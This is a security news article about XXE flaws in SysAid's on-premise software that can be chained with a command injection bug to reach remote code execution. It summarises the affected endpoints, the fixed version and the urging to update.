Cybersecurity researchers have disclosed multiple SysAid IT support software vulnerabilities that could lead to pre-authenticated remote code execution with elevated privileges. The flaws, tracked as CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777, are all classified as XML External Entity (XXE) injections, which can be exploited when attackers manipulate an application’s parsing of XML input.
Exploiting XXE Vulnerabilities: Remote Code Execution Risk
The SysAid IT support software vulnerabilities occur when attackers are able to inject unsafe XML entities into the web application, allowing them to conduct Server-Side Request Forgery (SSRF) attacks. In the worst cases, this can escalate to remote code execution, posing a serious risk to affected systems.
According to researchers Sina Kheirkhah and Jake Knott from watchTowr Labs, the specific vulnerabilities are as follows:
- CVE-2025-2775 and CVE-2025-2776: XXE flaws within the /mdm/checkin endpoint
- CVE-2025-2777: XXE vulnerability within the /lshw endpoint
These vulnerabilities can be easily exploited by sending specially crafted HTTP POST requests to the affected endpoints. Once successfully exploited, attackers could retrieve sensitive information, including SysAid’s InitAccount.cmd file, which contains the administrator’s username and plaintext password created during installation.
Exploitation Chain and Remote Code Execution
Once attackers have gained access to the administrator credentials, they can escalate their privileges and potentially gain full control over the SysAid system. The XXE vulnerabilities can also be chained with a command injection vulnerability—CVE-2025-2778, discovered by a third party—allowing attackers to achieve remote code execution.
SysAid has addressed all four vulnerabilities in on-premise version 24.4.60 b16, released in early March 2025. A proof-of-concept (PoC) exploit demonstrating the chain of vulnerabilities has already been made available.
Given that previous SysAid vulnerabilities like CVE-2023-47246 were exploited by ransomware groups such as Cl0p in zero-day attacks, users are strongly urged to update their installations to the latest version to avoid exploitation.
